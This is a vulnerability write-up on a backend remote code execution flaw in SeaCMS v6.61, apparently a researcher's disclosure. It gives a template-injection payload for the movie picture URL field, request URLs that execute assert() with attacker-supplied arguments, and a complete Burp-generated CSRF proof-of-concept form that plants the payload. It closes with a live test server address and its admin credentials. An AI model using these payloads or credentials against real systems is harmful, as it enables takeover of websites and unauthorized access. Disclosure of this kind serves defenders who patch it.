backend RCE in the latest version of SeaCMS(v6.61)
In SeaCMS’s admin platform, just in the page of publishing movies,due to the low limitation of the code injected in the picture’s url,we can execute random code to getshell.though there are some way’s in the /include/main.class to limit the usage of the code,we can find ways to bypass it.
So How does this vul be triggerd? here are some Steps:
- Firstly login to the admin panel, in this case the admin directory is adjusted to
/backend.
- Secondly add a movie and set it’s pictrue address as
{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}
- After adding it visit
/details/index.php?1.html&m=admin&a=assert&b=phpinfo();you can findphpinfo()is executed.
here 1.html refers to the id of the video you have just added.In my case, the video’s id is 2 so I executed as 2.html.
- Or you can just visit
/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();or any other places that display the video’s pic you have just added.
Also in the adding movie page it has no csrf protection so we can use CSRF to attacked it.
csrf poc is here:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<!-- adjust action to your url -->
<form action="http://127.0.0.1/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
<input type="hidden" name="v_commend" value="0" />
<input type="hidden" name="v_name" value="getshell" />
<input type="hidden" name="v_enname" value="ceshi" />
<input type="hidden" name="v_color" value="#FF0000" />
<input type="hidden" name="v_type" value="5" />
<input type="hidden" name="v_state" value="5" />
<input type="hidden" name="v_pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
<input type="hidden" name="v_spic" value="" />
<input type="hidden" name="v_gpic" value="" />
<input type="hidden" name="v_actor" value="" />
<input type="hidden" name="v_director" value="" />
<input type="hidden" name="v_commend" value="0" />
<input type="hidden" name="v_note" value="" />
<input type="hidden" name="v_tags" value="" />
<input type="hidden" name="select3" value="" />
<input type="hidden" name="v_publishyear" value="" />
<input type="hidden" name="select2" value="" />
<input type="hidden" name="v_lang" value="" />
<input type="hidden" name="select1" value="" />
<input type="hidden" name="v_publisharea" value="" />
<input type="hidden" name="select4" value="" />
<input type="hidden" name="v_ver" value="" />
<input type="hidden" name="v_hit" value="0" />
<input type="hidden" name="v_monthhit" value="0" />
<input type="hidden" name="v_weekhit" value="0" />
<input type="hidden" name="v_dayhit" value="0" />
<input type="hidden" name="v_len" value="" />
<input type="hidden" name="v_total" value="" />
<input type="hidden" name="v_nickname" value="" />
<input type="hidden" name="v_company" value="" />
<input type="hidden" name="v_tvs" value="" />
<input type="hidden" name="v_douban" value="" />
<input type="hidden" name="v_mtime" value="" />
<input type="hidden" name="v_imdb" value="" />
<input type="hidden" name="v_score" value="" />
<input type="hidden" name="v_scorenum" value="" />
<input type="hidden" name="v_longtxt" value="" />
<input type="hidden" name="v_money" value="0" />
<input type="hidden" name="v_psd" value="" />
<input type="hidden" name="v_playfrom[1]" value="" />
<input type="hidden" name="v_playurl[1]" value="" />
<input type="hidden" name="m_downfrom[1]" value="" />
<input type="hidden" name="m_downurl[1]" value="" />
<input type="hidden" name="v_content" value="" />
<input type="hidden" name="Submit" value="�¡®�®š�浜¤" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
you can test this vul at http://111.230.11.248:10089/backend/,and the username and password is admin|admin.